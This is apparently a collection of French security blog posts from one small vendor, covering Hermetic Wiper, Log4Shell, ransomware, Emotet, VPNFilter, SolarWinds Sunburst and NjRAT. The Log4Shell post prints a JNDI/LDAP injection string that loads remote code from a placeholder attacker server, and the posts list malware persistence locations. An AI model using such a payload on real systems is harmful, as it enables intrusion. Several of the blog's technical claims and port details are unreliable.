FloreSecurity - Lab

Rapport concernant les attaques informatiques Russe sur l'Ukraine.

Avant toute chose, il est important de préciser le fait suivant, bien que les attaques proviennent de la Russie, rien n'a jamais été prouvé concernant les capacités du Kremlin dans la cyber guerre. Cela peut très bien être des actions nationalistes.

Le rapport d'analyse porte sur les points suivants.

1 - Introduction de l'analyse.

2 - Observation concernant le déni de Service.

3 - Observation concernant la défiguration (déface) des sites Ukrainiens.

4 - Observation concernant le virus "Hermetic Wiper".

5 - Hermetic Wiper vs FloreSecurity.

6 - Analyse de la stratégie de cyber défense Ukrainienne.

7 - Analyse des représailles.

8 - FIN.

1 - Introduction de l'analyse.

La Russie est un des pays qui compte le plus de forum et le site dont l'intérêt premier est le piratage informatique, l'hacking, et la cybersécurité. Il n'y a de facto rien d'étonnant à ce que des nationalistes Russes puissent lancer des attaques informatiques dans les intérêts de leur pays, et c'est tout à leur honneur bien que je sois en profond désaccord avec la Russie depuis toujours. Mais là on touche l'opinion idéologique, l'opinion politique, mon avis sur le président Russe n'est pas le sujet ici.

Cette analyse n'a pour vertu que d'observer les évènements dans l'espace cybernétique de l'Ukraine, afin d'anticiper a l'avenir sur les réseaux de l'OTAN et de l'Europe les actions de cette adversaire.

2 - Observation concernant le déni de service.

Le déni de service, c'est l'attaque informatique la plus utilisé dans le monde. Elle est simple à mettre en place, et quand son débit est suffisant, les conséquences sont une perte de connexion sur la cible.

Le déni de service lancé depuis le territoire Russe sur les réseaux Ukrainien été employé dans deux opérations bien distinctes.

- La première opération, c'est l'attaque des infrastructures web de l'Ukraine, le déni de service a dans ce cadre pour utilité de faire diversion, l'administration se concentre alors sur le déni de service et son atténuation sans faire attention aux attaques plus sophistiquées.

- La seconde opération, c'est le parasitage des réseaux de l'Ukraine afin d'essayer de bloquer les communications. Bien que cette opération n'ait pas vraiment marché. Si cette thèse est avancée par des confrères, je pense pour ma part que ce qui a déstabilisé les communications Ukrainiennes, c'est davantage l'état physique des infrastructures servant à faire fonctionner internet en Ukraine, ou de simple coupure d'électricité.

À noter que les attaques par déni de service sont très utiles dans le cas d'un pays comme l'Ukraine qui n'a pas de budget cyber défense et des serveurs de petite taille.

3 - Observation concernant la défiguration (déface) des sites Ukrainiens.

C'est justement ce qui a mon sens a été camouflé par le déni de service. En faisant cela, les administrateurs se sont concentré sur l'attaque par déni de service de peur de ne plus pouvoir afficher les informations sur leur site web, et n'ont pas fait attention à d'autres actions.

À mon avis le déni de service était là pour camoufler des processus d'analyse et d'injection des infrastructures web, voir camoufler des attaques par Brute Force consistant à tester le plus de mot de passe possible sur la page de connexion de l'administration.

4 - Observation concernant le virus "Hermetic wiper".

Nous avons reçu un échantillon du virus "Hermetic wiper", qui est un virus qui compresse le secteur de démarrage MBR (Master Boot Record). Les ordinateurs sous MBR sont vieillissants, et seront toujours plus fragiles face aux wiper s'attaquant au secteur de démarrage que les récentes technologies EFI.

Concernant l'analyse faite, nous savons que Hermetic Wiper va se servir d'un service qu'il importera pour atteindre le MBR (vous avez là un programme malveillant qui se contente de détourner un service, en l'occurrence un fichier pilote "EaseUS Partition Master" obsolète, de la société Chinoise "CHENGDU YIWO Tech Development").

Il va créer le service, il va modifier la valeur de la clé de registre "SYSTEM\CurrentControlSet\Control\CrashControl" "CrashDumpEnabled" et la passer à "0", afin d'empêcher les rapports d'erreur système d'être déclenché. Cela s'explique par le fait qu'ils ont juste synchronisé leur programme malveillant avec le fichier pilote "EaseUS Partition Master", ce pilote comme mentionné plus haut est obsolète et cela peut générer des erreurs critiques, qui feront apparaitre un écran bleu et donc un redémarrage avec analyse voir réparation système.

Ensuite, il relance l'ordinateur, et au démarrage le service est installé puis exécuter.

Malgré son instabilité apparente, le programme joue son rôle, il compresse le secteur de démarrage MBR et empêche l'ordinateur de démarrer. Dès lors, l'ordinateur doit subir un reformatage.

Toutefois, Hermetic Wiper a besoin au minimum des privilèges d'administrateur pour pouvoir fonctionner correctement. S'il n'est pas exécuté avec les privilèges administrateurs, il ne pourra pas atteindre les registres "System" et "Local Machine", ni charger un quelconque périphérique.

Il y a là aussi un amateurisme de la part de l'attaquant qui n'a semble-t-il pas les compétences nécessaires pour faire une élévation de privilège, dans notre cas nous disposons pour nos essais de pas moins de 5 méthodes d'élévation que nous avons développées.

5 - Hermetic Wiper vs FloreSecurity.

Nous avons après notre analyse exécuter le programme malveillant face à notre suite de sécurités "FloreSecurity Endpoint Security System" qui a détecté la menace sans modification préalable.

Majorité des antivirus du grand marché on eut à faire une mise à jour de leur base de donné, bien qu'à leur où j'écris cet article, Baidu, Comodo, Cybereason, F-Secure, SentinelOne, Trend Micro, n'ont toujours pas la capacité de détecter ce programme malveillant.

Dans le cas de SentinelOne, ils ont posté un article ou ils donnent pas mal d'informations intéressants, je pense qu'une solution est à l'étude de leur côté.

Nos méthodes et les évènements de ces dernières années nous confortent dans notre stratégie de sécurité.

6 - Analyse de la stratégie de cyber défense Ukrainienne.

Si on devait résumer en un mot l'ensemble de la stratégie de cyber défense Ukrainienne, se serrait "néant".

Il n'y a pas à notre connaissance de budget sécurité informatique en Ukraine, ce qui s'explique principalement par le fait que l'Ukraine, au Vu du pédigrée de ses voisins, a légitimement préféré s'équiper d'arme létale.

Sur ce qui concerne le dénie de service, leurs serveurs comme leurs infrastructures réseau sont dépassé en raison de leur age. Idem pour les infrastructures web, des sites de l'éxécutif Ukrainien on été défiguré, alors que ce sont des attaques plutôt primaire au yeux de nos experts en sécurité web.

Pour ce qui est du virus Hermetic wiper, il est évident que si les ordinateurs attaqués avaient été correctement configurés (une session administrateur déconnecté et une session normale pour l'usage), et qu'un bon système antivirus avait été installé, jamais ce virus mal programmé par un petit Sergueï au fond d'une cave, n'aurait pu faire le moindre dégat.

7 - Analyse des représailles.

Tout d'abord, nous envisageons si les évènements de cyberguerre en Ukraine venaient à venir jusqu'en Europe, a notre niveau, lancé des représailles.

Nous ne donnerons pas les moyens ici, une entrée en cyberguerre de notre part reste hypothétique, mais nous allons expliquer dans ce dernier point pourquoi les activistes (anonymous ou autres) ne font dans leur cyberguerre contre la Russie, que tapper dans l'eau avec une épée en mousse.

Il faut savoir que les sites web Russes visible par nos ordinateurs ne sont que des panneaux d'affichage, le gros de l'internet russe n'est PAS ATTEIGNABLE par nous, dans la mesure où ils ont développé leur propre internet quand tous les autres pays dépendent du même internet. Les protocoles changeants, les architectures changent et donc la visibilité par nos outils est restreinte.

Quand Anonymous se targue d'avoir fait fermer des sites web de l'exécutif Russe, ils n'ont pas anticipé dans leur amateurisme primaire que ce n'était que des petits panneaux d'affichage, et que tout le réseau informatique Russe est protégé de toute attaque extérieure, pour l'instant.

Voilà comment ça c'est passer pour l'administrateur du site Russe. Il étant tranquillement assis sur son fauteuil dans ça cabane au fin font de la Sibérie, en train de déguster une vodka saveur urine d'ours en écoutant "Boney M. - Rasputin".

Quand il a vu que des enfants en pleine puberté ou des chômeurs anarchiste cherchaient à se connecter massivement à son site, ils sont venu, il a vu, il a coupé la connexion de son serveur parce-qu'il avait envie de prendre des vacances avant de montée dans un t-34 pour aller jouer au conquérant face aux civils désarmés de l'Ukraine.

Bref, initiative ridicule par des attaquants ridicules a l'encontre d'un site tout aussi ridicule, qui n'était qu'un panneau d'affichage pour donner quelques informations au monde extérieur à la Russie.

Si on veut dans le cadre de la cyberguerre être efficace durablement face à la Russie, il faut dans un premier temps veiller à protéger nos concitoyens et cela passe par les équiper de bon antivirus et le formé a la cybersécurité.

En suite, chercher les échantillons des programmes malveillants Russe et les analyser dans des environnements virtuel ou par le biais de lecteur de code afin de prendre des mesures contre leurs évolutions.

8 - FIN.

Nous mettrons à jour ce poste au fur et à mesure que nous récupérerons des informations concernant cette campagne de cyber guerre en Ukraine.

À bientôt.

Bonjour à tous.

Pour commencer, les fumeurs de cannabis vous prenez un joint, les fumeurs une cigarette, les alcooliques une vodka, et le reste vous faites un aller retour tout nu dehors pour vous rafraichir les idées, vous revenez ensuite.

C'est la débâcle, tout le monde tremble pour un problème plus soluble que du foie gras au soleil!

On m'a contacté il y a quelques jours pour me parler de la vulnérabilité Log4Shell, et me dire à quelle point tout le monde sanglotait sous sa couverture "la petite sirène" en câlinant Winnie l'ourson.

La raison de pourquoi je ne m'en suis pas inquiété, c'est que quand la notification m'est arriver la première fois fin novembre, jais lut "remote code" et "apache", jais de suite comprit qu'apache était impacté par une vulnérabilité qui n'est pas de mon ressort puisque mon travail concerne la sécurité antivirus, les programmes malveillants, les rootkits (donc en gros des produits délivrés par une vulnérabilité, la vulnérabilité en elle-même c'est au constructeur du programme de la résoudre).

Mais en plus, une vulnérabilité type "remote code" concerne des programmes et protocoles, qui ne sont jamais utilisés par nous et que nous bloquons chez nos clients dans plus de 90 pourcents des cas, vus qu'aucun de nos clients n'utilise ces outils ou ces protocoles.

Dans le cas de cette vulnérabilité, FloreSecurity n'utilisant pas apache et ne travaillant avec aucun code java (comme ça vous le savez), sur log4shell, ce qui va nous intéresser pour notre clientèle, c'est les moyens d'atténuation voire de blocage de la menace le temps que les patchs soient appliqués.

Log4Shell fonctionne de la façon suivante (en vulgarisant pour que vous compreniez bien).

Un attaquant qui arrive à obtenir une adresse IP ou un nom de domaine utilisant le protocole LDAP va tenter d'envoyé une via une URL JNDI en utilisant le protocole LDAP.

Pour cela...

La commande "${jndi:ldap://serveur_pirate.com:serveur_port/malware.java}" pour exemple probant, va simplement télécharger le code malveillant .java depuis le serveur du pirate, et exécuter le script sur l'environnement qui l'aura téléchargé.

Donc cela peut être aussi bien un code payload pour télécharger des programmes malveillants, un code d'enregistreur de frappe, de ransomware, de voleur de mot de passe, voir des scripts pour détériorer le système.

Maintenant, gogo power ranger.

Pour commencer, LDAP le protocole utilisé dans cet exploit, peut-être bloqué sur le pare-feu Microsoft Windows comme tous les protocoles.
La connexion LDAP se fait sur le port 636 (TCP).
Le port 3269 (TCP) pour se connecter à un annuaire.

Pour votre sécurité et la sécurité des autres, si vous n'utilisez pas LDAP, bloquez ces deux ports dans le pare-feu Microsoft Windows.
Cela aura pour effet d'empêcher le protocole de recevoir ou d'envoyer des requêtes, requêtes pouvant contenir des commandes.

LDAP étant simplement le protocole utilisé par Log4Shell pour transférer les commandes, il est bon de prendre en compte que des requêtes Jndi sont aussi utilisé.

La suppression directe de la classe "JndiLookup.class" se trouvant d'après nos sources sur : "C:\Users\Nom_Utilisateur\LOG4J\log4j-core-2.14.1.jar\org\apache\logging\log4j\core\lookup\JndiLookup.class", suffira à empêcher les fonctions URL JNDI de fonctionner mais perturbera légèrement le programme log4j.

Si vous utilisez une application qui utilise Java, comme par exemple pour les jeux Minecraft ou la plateforme Steam, des suites de programme de sécurité comme Eset, McAfee, CyberReason, BitDefender, et bien d'autres programmes de différentes utilités, vous devriez appliquer les conseils donnés ici. L'utilisation des programmes n'en serra pas détériorer.

FloreSecurity a rajouté une région de code spécifique à son programme "FloreSecurity EndPoint VulnScan" afin qu'il puisse détecter et atténuer la vulnérabilité Log4Shell.

De prochains articles arrivent, car on ne m'a pas parler que de Log4Shell.

Il y a aussi un cheval de Troie type R.A.T, lui aussi écrit en JAVA, qui mérite une petite pichenette.

À plus tard... ^^

Je fais ici un article pour parler d'une menace qui fait peur.

Le Ransomware, c'est ce truc que vous voyez arriver sur votre ordinateur et qui vous demande une rançon après avoir chiffré vos fichiers.

Comment ça marche?

- Le Ransomware arrive sur le système et met sa persistance en place pour être sur de chiffrer les nouveaux fichiers arrivant sur la machine. Il peut aussi se propager.

- Il commence à lister les fichiers présents sur le système (il cible bien souvent pour gagner du temps et être sur de faire mouche, le bureau, les documents, images, vidéos, photos, téléchargement, favoris et fichiers récents et disques amovibles sont principalement ciblés).

- Il les chiffre avec un chiffrement spécial.

C'est là qu'il vous demande une rançon en échange d'une clé de déchiffrement pour que vous retrouviez vos données.

On ne paye pas, c'est la première des choses! Payer, c'est encourager ces gens qui n'ont pas inventé l'eau chaude à continuer leurs exactions indéfiniment dans le temps.

Le cas WannaCry, tellement cité par les compagnies d'antivirus, est particulier dans le sens ou il a été d'une part médiatisé.

Le processus de WannaCry est utilisé pour charger un (.dll) dans une autre instance de processus, ce qui a pour but de tromper les antivirus. C'est le module qui fait le chiffrement, pas le processus, qui n'a à chaque démarrage que pour rôle celui de recharger le module.

Cela a été utilisé avec le Wyper Petya quelques semaines après, qui utilisaient la méthode de WannaCry, sauf qu'il ne chiffrait pas mais endommagés le secteur de démarrage Master Boot Record pour empêcher le système de démarrer. Dans son cas, le système de rançonnage ne fonctionnait pas (sans blaguer, les mecs ont bien joué leur coup).

Voilà pourquoi je le répète ici. Le fonctionnement d'un Anti-Ransomware n'est PAS de bloquer le ransomware ou de l'empêcher de nuire, mais uniquement d'alerter l'utilisateur d'un début d'attaque. Sauf que bien souvent, c'est déjà trop tard.

Dans un autre cas, la surveillance a lieu au niveau du bureau. Si les fichiers listés ont une extension ajoutée où sont illisibles (dans le cas d'une balise), une alerte.

Vous l'avez compris, l'anti-ransomware ne repose que sur la surveillance de l'État de certains fichiers, et non sur le comportement de nouvelles instances processus/service/script/etc sur l'ordinateur.

Il est donc loin d'être aussi performant qu'un antivirus pour vous protéger des attaques de ransomware.

L'aspect peu pratique peut lui aussi être étayé avec aisance...

Un antivirus, un pare-feu, comme une suite de protections complètes, cela prend de la ressource sur votre machine.

Avoir pour votre sécurité l'antivirus, le pare-feu, l'anti-ransomware, l'anti-wiper, l'anti-rogue, l'Anti-silentminer, et toutes les déclinaisons possibles d'anti-programme malveillant est inutile et contre-productif.

Vous perdrez en ressources parce qu'une quantité de routine de sécurité par forcément efficace serrons présente sur votre système.

Un antivirus peut quant à lui faire anti-ransomware, n'étant plus aujourd'hui configuré pour arrêter seulement les virus mais toutes les déclinaisons de programme malveillant, ce qui est un gain de temps pour les développeurs de programme de sécurité, et un gain de ressource pour l'utilisateur qui n'a quant à lui pas à jongler entre les interfaces de contrôle et le gestionnaire des tâches pour voir ce que lui prennent en ressources les instances ouvertes, et à faire le deal entre utiliser Google et le dernier anti-machin à la mode trouvée sur securite-de-con.World !

Je vous laisse comparer les offres de ce type de programme. Testez et jugez par vous-même de l'inefficacité affligeante de ce genre de programme (de préférence sur une machine virtuelle, le monde vous remercie).

Vincent Léon Flores.

Emotet, Trick Bot, Dridex et Necurs sont de grands noms de la virologie.

Nous ne sommes plus là sur les traditionnels chevaux de Troie que l'on rencontre habituellement (NjRAT, DarkComet RAT, NanoCore RAT, etc).

Faisons une petite comparaison.

Groupe 1 (G1) = NjRAT, NanoCore, DarkComet, etc.

Groupe 2 (G2) = Emotet, TrickBot, Dridex, Necurs, etc.

Comparaison :

G1 et G2 vont utiliser les mêmes méthodes de persistance.

G1 et G2 vont utiliser les mêmes méthodes de propagation (cela va surtout dépendre de l'organisation de l'attaquant).

G1 et G2 ne vont PAS se présenter de la même façon.

Voyez le groupe 1 comme des programmes malveillant mono-module. Ils n'ont qu'un module et s'en contentent.

Le groupe 2, plus évolué, est modulaire, plusieurs modules donc.

Dans les grandes lignes, en vulgarisant, la stratégie va être d'arriver sur le système de la même façon qu'un membre du groupe 1, sauf qu'au lieu de rester sous forme d'instance de processus pour lancer ses actions malveillantes, le programme va charger plusieurs modules (.dll pour exemple probant). Ou dans ça propre instance de processus, ou dans d'autres instances de processus.

Le processus (.exe) qui est utilisé par le programme malveillant n'ont plus que pour vocation de gérer quelle module est chargé/déchargé des processus, il peut parfois devenir passif en se ferment ou en se mettent en attente pour ne pas éveiller les soupçons des analyses comportementales de certains antivirus.

C'est ce processus qui est relié à la persistance, cela passe par les répertoires de démarrage, les clés de registre qui peuvent permettre l'exécution d'un programme au démarrage, les tâches planifiées. Pareillement que pour le groupe 1, mais parfois la persistance peut passer par la création d'un service.

Pour empêcher les modules d'être chargé en mémoire par notre processus gestionnaire, c'est lui que la stratégie de défense veut que l'on attaque en premier.

La difficulté est en revanche un peu plus élevée que le groupe 1 car dans certains cas une routine sous forme, là aussi de module charger extérieurement peut réinitialiser en boucle l'instance du processus gestionnaire a l'image d'une tache planifiée.

Là où il faut relativisé, c'est que d'une part ces programmes malveillants sont très bien détectés par les antivirus aujourd'hui.

D'autre part, les méthodes de désinfection et d'atténuation sont connus des sociétés de cyber sécurité.

Vincent Léon Flores.

On m'a réveillé aujourd'hui à 2 heures du matin pour me raconter d'immondes conneries au téléphone, dans ces conditions, ne vous étonnez pas de ma nonchalance!

On m'informe que le réseau de machine zombie (botnet) Emotet aurait été... Détruit....

Non mais ce n'est pas possible d'entendre de pareilles conneries.

Ce n'est pas possible, non mais je rêve éveiller (sans mauvais jeux de mots).

Que s'est-il passé?

Une opération internationale visant à supprimer le botnet Emotet s'est transformé en une altération du réseau d'Emotet, et non pas d'une mort complète. Nos chères amis sortant d'IUT avec mention très bien ce sont trop rapidement enjoyer, a tort.

Je le répète. Ce n'est PAS parce-que vous fermez des serveurs, arrêtez quelques clampins, que vous avez démonté un programme malveillant.

Non, déjà on ne démonte un programme malveillant que quand on sait parfaitement le détecter et le neutraliser ce que vous n'avez pas fait, les antivirus ont toujours du mal avec Emotet et les systèmes sont toujours aussi vulnérables.

Vous avez juste désactivé les robots à partir des serveurs de contrôle, mais si le programme malveillant revient sous une autre forme, il ne serra pas contrôler par vous, mais par un autre serveur de contrôle.

En 2019 déjà, la gendarmerie Française prétendait avoir supprimé le botnet "Retadup".

Ils ont juste pris le contrôle d'un serveur et ont retiré supprimer tous les robots.

Ils ont supprimé un serveur, pas tous. Si c'était aussi simple, ça ce saurait!

Si la supression du serveur de Retadup a fait peur à ces propriétaires, qui n'ont pas retenté l'expérience ce qui explique entre autres que le botnet n'a pas été détecté à nouveau...

Ce n'est pas le cas d'Emotet qui a refait parler de lui moins de 24 heures après l'annonce de ça supposée destruction et qui en plus, a largement fuité ces dernières années.

Vous pouvez arrêter d'autres clowns, vous pouvez prendre leur ordinateur et fermer leur serveur.

Mais vous ne pouvez pas supprimer définitivement un programme malveillant qui a été partager sauf en sécurisant correctement tous les systèmes de la planète.

Cessez d'affirmer des conneries pour vous rendre intéressant. Vous ne faites que désinformez les utilisateurs lambda.

Aller, pour le plaisir, quelques titres de merde. Tous des torchons d'incompétence.

lemondeinformatique : "Europol casse le redoutable botnet Emotet"

Non, on le casse pas un programme informatique. On le supprime d'un système mais ce n'est pas physique un programme informatique. ça ne peut pas casser.

lefigaro : "Le logiciel pirate le plus dangereux du monde neutralisé"

Non plus. On ne neutralise pas un programme malveillant. On le supprime d'un système et dans le cas présenté, juste fermer les serveurs de contrôle.

RTL : "La police fait tomber Emotet, pierre angulaire de la cybercriminalité mondiale"
Toujours pas. D'ailleurs, il n'est pas angulaire. Il a servi à propager des programmes malveillants importants comme par exemple le botnet Trick Bot, qui lui-même a propager le ransomware Ryuk, mais d'aucune façon il ne gérait toutes les attaques informatiques. Il en a géré beaucoup, mais pas assez pour être angulaire. Aucun ne le serra jamais, il faut une logistique trop importante.

Le parisien : "Cybercriminalité : comment une opération internationale a mis fin au puissant réseau Emotet"

Ouai bon, ils sont parisiens quoi. De vrais moutons.

Le seul titre potable à défaut d'avoir un contenu réaliste, c'est Le Monde : "Le réseau Emotet, l’un des plus gros logiciels de cybercriminalité, démantelé lors d’une opération internationale".

Le réseau, a été altéré. Voilà.

Je ne vais pas tous vous les cités, ils se répètent dans leur titre comme dans leur article et je n'est pas que ça à foutre de me répéter personnellement.

Mais vous l'avez compris, on ne détruit pas un programme malveillant comme ça. C'est de la foutaise, et déjà l'on constate que c'est faux.

Vincent Léon Flores.

Trend Micro informe le monde que le programme malveillant VPNFilter, connus pour infecter les routeurs, est toujours actif sur des centaines de routeurs (c'est peu).

Désireux de faire parlé d'eux, les oubliés de Trend Micro on oubliait de nous donner la localisation géographique des ordinateurs, histoire que l'on sache ou le groupe APT28 à décider de frapper.

Alors dans le doute que certains d'entre-vous ne se soient fait pirater par le programme malveillant, dans un premier temps, je vous renvoie vers une règle de détection pour analyser votre système et déterminer si un module de VPNFilter a été déposé.

Je précise que FloreSecurity ne développe pas de règle YARA. Seulement des procédures de désinfection.

Règle de détection : https://gist.github.com/arunl/e66c9aee232eee7d4881c6e691f020ae

Voici la méthode pour supprimer VPNFilter.

Veuillez noter que : le FBI conseillait de seulement redémarrer le routeur infecté, et après analyse il a été observé que VPNFilter persistait.

- Commencez par tenter une réinitialisation mode usine.
Si cela ne retire pas le logiciel malveillant, persistez dans les mesures suivantes.

- Sauvegardez les paramètres du routeur infecté. (Enregistrer les paramètres n'enregistre pas VPNFilter).

- Télécharger la dernière version du Firmware du routeur.
Cela se trouve dans le site support du routeur.

- Déconnectez le routeur.

- Éteignez le, compté jusqu'à 30 et rallumez-le.

- Si une nouvelle version est disponible, mettez à jour votre firmware. Si vous possèdes la dernière version, réinstallez.

- Si vous pouvez configurer votre routeur manuellement, il est recommandé de le faire. Sinon, utilisé les paramétrages sauvegarde.

- Désactiver l'administration à distance.

- Modifiez vos identifiants d'administration.

- Reconnectez votre routeur.

J'avais écrit sur mon ancien blog un article sur VPNFilter, je pensais le problème résolu, je me suis trompé.

Nous avons ici un exemple typique d'une menace qui aurait pu être rendu inutilisable si tout le monde avait fait le nécessaire (des distributeurs des routeurs aux responsables sécurité informatique).

Vincent Léon Flores.

Bonjour.

Cet article vient compléter le précédent en rapport avec les soucis de l'entreprise SolarWinds quant à sa suite de logiciels Orion.

Un autre programme malveillant a été détecté, écrit en C# (tout comme SunBurst), il se prénomme Supernova (décidément, on en finit plus avec les noms a couché dehors avec un ticket de logement).

Commençons par expliquer ce qu'est Supernova.

La .dll "app_web_logoimagehandler.ashx.b6031896.dll" est remplacé par une version malveillante. Contrairement à SunBurst, la .dll n'est pas signée.

La persistance se fait via le chargement de la .dll par le programme Orion, ce qui rend Supernova très furtif, mais aussi très fragile tout comme SunBurst.

Il est aussi fait mention d'un second module malveillant capable quand à lui d'exploiter le programme Orion pour permettre le déploiement du code malveillant.

Mais, personne n'a eu la présence d'esprit ni de nous transmettre le nom et les indicateurs de copromissions de ce second module, ni de nous dire s'il se trouvait sur tous les systèmes infectés par Supernova, ou seulement sur les ordinateurs de la société SolarWinds, qui distribue le programme Orion.

Côté fonctionnalité, c'est une sorte de porte dérobée qui est conçue pour d'une part, recevoir des instructions de son propriétaire, d'autre part, générer le code qui lui est envoyé et l'exécuter en mémoire (cela fait qu'il n'y a pas de fichier compiler sur l'ordinateur, tout le code est généré et exécuter en mémoire pour empêcher les programmes antivirus de détecter le code malveillant).

Jais déjà vue plusieurs fois du code permettant d'exécuter en mémoire un autre code, ce qui change c'est qu'ici c'est un module .dll qui génère le code et est parfaitement bien intégrer au programme qui charge le module .dll malveillant.

Pour information, la dernière mise à jour de Orion permet de résoudre les vulnérabilités et assainir le programme.

Le programme que FloreSecurity a développé pour SunBurst prendra aussi en charge Supernova.

Vincent Léon Flores.

Bonjour/bonsoir.

Cet article est dans un premier temps pour moi, l'occasion de vos souaihtez un joyeux Noël.

Mais vous vous en doutez, je ne suis pas venu ici pour distribuer des papillotes en chocolat.

Depuis quelque temps, je vois passer sur mon fil d'actualité les mentions "Sunburst" et "Solar Winds".

Je ne m'étais dans un premier temps pas penché sur cette attaque informatique, étant fortement occupé ailleurs, et ayant la prématurée conviction que c'était un service ou un logiciel qui était impacté par un détournement.

La conviction fut confirmée, et devant l'insistance de la communauté InfoSec et des médias, je me suis penché sur la question.

La première chose que je suis allé voir, c'est de quoi il s'agit.
Si c'est une attaque touchant des infrastructures web, ce n'est pas mon domaine professionnel.
Si c'est une attaque touchant le réseau, alors il suffit que les administrateurs mettent à jour leurs règles de pare-feu et les protocoles comme ce fut fait avec les exploitations du protocole RDP l'an passé, où  SMB il y a 2/3 ans.
Si c'est une attaque virologique (et c'est le cas), alors, c'est mon domaine et il ne fera pas long feu (sans mauvais jeu de mots).

D'après ce que jais lut et en vulgarisant pour que tout le monde comprenne bien...

Jais tout d'abord entendu dire que le vecteur d'attaque serrait le système de mise à jour du logiciel Orion, ce qui aurait facilité l'infection. Vrais? faux? C'est à SolarWinds de répondre à ce propos.

Un fichier du logiciel Orion de la société SolarWinds est remplacé par un autre cette fois malveillante, contenant la charge utile de Sunburst.

Le fichier "SolarWinds.Orion.Core.BusinessLayer.dll" (une librairie chargée en module) est remplacé par un fichier .dll du même nom, mais contenant la charge de SunBurst.

Le programme Orion est mis à jour, et à la suite de cela, selon la version du système, le fichier .dll malveillant serra charger dans les instances de processus légitime d'orion : SolarWinds.BusinessLayerHost.exe ou SolarWinds.BusinessLayerHostx64.Exe

C'est un fichier .dll légitime qui est remplacé par une mauvaise copie. Je le répète.

On parle donc bien de module chargé dans une instance de processus, ce qui signifie que pour fonctionner, la même .dll a besoin de cette instance.
Pour mettre hors fonctionnement la .dll, il suffit alors de désactiver le processus et de chercher la .dll afin de la supprimer.

Après ça, Orion ne fonctionnera pas correctement, il faudra alors le réparer (contactez le staff SolarWinds, qu'ils fassent leur travail).

Et surprise... Jais réussi à me procurer l'échantillon de la charge utile de Sunburst.
La charge est bien détectée par le moteur d'analyse antivirus que je développe.
Quant à la suppression, l'outil de désinfection que j'utilise en opération peut résoudre l'attaque.

Une nouvelle règle de détection serra ajouter pour identifier SunBurst plus facilement, même si je doute que je le croise régulièrement.

Alors, vous allez me dire, mais c'est tout simple en fait, pourquoi en font-ils tout un plat?

Et je répondrais comme toujours que les chercheurs en cybersécurité ont un intérêt : être référencé pour être connus, et que les gens qui ne comprennent pas grand chose achètent leur livre ou leurs programmes de sécurité.

Les chercheurs comme à leur habitude grossissent les traits d'une attaque informatique avec la complaisance cette fois des autorités qui se sentent dépassé.

SunBurst a été utilisé pour attaquer la première puissance mondiale militaire en se chargeant dans un programme normalement légitime et donc peu surveiller.
C'est une attaque qui reste assez sophistiquée, mais détectable et retirable par les bons antivirus.
Le souci fut que SunBurst a la capacité de désactiver la plupart des antivirus, ou s'évader de l'analyse dans des environnements virtuels ou des bacs à sable des autres.

Nous pouvons parfaitement le qualifier de RootKit (mais alors très basique), ainsi que de BackDoor HTTP.

"Plus de 40 organisations piraté dans 8 pays".
Donc pas une attaque importante au niveau du nombre de machines touchées, mais importante par ce qu'elle a touché.
Des agences gouvernementales, des sociétés de conseil, de technologie, de télécommunications de pétrole et de gaz, ont été touchées.

Lefigaro : "Avec l’attaque SolarWinds, la cybersécurité occidentale en pleine remise en cause".
Et c'est tout à fait normal quand on connaît l'état de la sécurité informatique occidentale. Surtout que rien n'a été fait pour atténuer significativement les attaques informatiques.

Lefigaro : "C’est la campagne d’intrusion aux conséquences les plus profondes jamais connue à ce jour"
Non. En Allemagne, Septembre 2020, une femme est morte parce-qu'une attaque informatique a mise hors-service des machines médicales.
ça c'est grave! Que Microsoft ce soit fait voler des dossiers? Que certains est perdu de l'argent ou vus leur petit secret volé? C'est minime comparé à ce qui vous attend, et donc m'attend car je n'ai pas de contrôle sur vos systèmes de sécurité donc ce qui nous attend, si vous n'évoluez pas sur la gestion de vos systèmes informatique.

Récemment, c'est un hôpital à côté de chez moi qui a subi une attaque informatique.

Sans gravité, fort heureusement, mais je suis assez agacé de lire que l'Agence Nationale de la Sécurité des Systèmes d'Information (l'ANSSI) à "tenter d'enrayer" une attaque de ransomware.

Quand l'agence la plus importante dans la cyberdéfense Française se contente de "tenter", d'autres n'ont jamais de soucis avec les ransomwares parce-qu'ils sont : bien sécurisé, prudent et sérieux.

Conclusion finale.

Le programme malveillant SunBurst n'est pas franchement une nouveauté en matière d'attaque informatique.

La faute à qui? À la négligence d'une entreprise comme SolarWinds qui ne vérifie pas la viabilité de ces modules en temps réel.
La faute aux prétentieux qui avec leur programme complexe pensent améliorer la sécurité et la gestion, alors qu'ils fragilisent durablement nos systèmes.

Un virus informatique, ce n'est pas très compliqué quand on connaît la démarche des attaquants.

Je vous souhaite à nouveau un joyeux Noël, et une bonne fin d'année.

Certains articles étant en préparation depuis un certain temps, ils risquent de sortir d'ici à la fin Janvier.

FloreSecurity reste à la disposition de ses clients. Un outil de suppression de SunBurst a été développé, IceBurst.

Vincent Léon Flores.

Golden Edition, Original Edition, Lime Edition, peu importe le nom, la couleur ou le chiffre, l'architecture de NjRAT est condamné à ne pas évoluer significativement.

De facto, nous ne considérons plus ce programme comme une menace depuis des années.

Beaucoup de petits pirates utilisent cette menace devenue open source pour tenter de se faire un nom dans la gamme de la virologie.

Premièrement, un cheval de Troie NjRAT peut vous être délivré de plusieurs façons. Par exemple ;

- Par un téléchargement hasardeux fait sur un site douteux.

- Par mail ou par serveur de discussion (phishing).

L'infection se passe de la façon générique suivante.

Le programme malveillant est importé et lancer, il vérifie s'il se trouve dans le répertoire sélectionné par le pirate dans le panel de création du client. S'il n'est pas, il se copie de lui-même et ferme la précédente instance de processus.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Il peut aussi dans les versions comme NjRAT Lime Edition créer une tâche planifiée qui ne permet pas seulement de redémarrer à chaque démarrage, mais aussi d'être relancé toutes les minutes/heures/jours si le processus est arrêté par l'utilisateur ou un programme, ce qui rend quasiment impossible la désinfection manuelle de ce type de menace.

Pour se protéger, le programme malveillant peut s'il est lancé en administrateur mettre son processus en processus critique, de sorte a ce que s'il est tué par l'utilisateur, tout le système redémarré parce-qu'un composant critique a été arrêter.

Il faut alors utiliser des programmes spéciaux pour retirer cette protection afin de pouvoir tuer le processus du programme malveillant.

Certaines versions comme NjRAT Danger Edition ont été observées recopiant un RootKit de Ring 3.

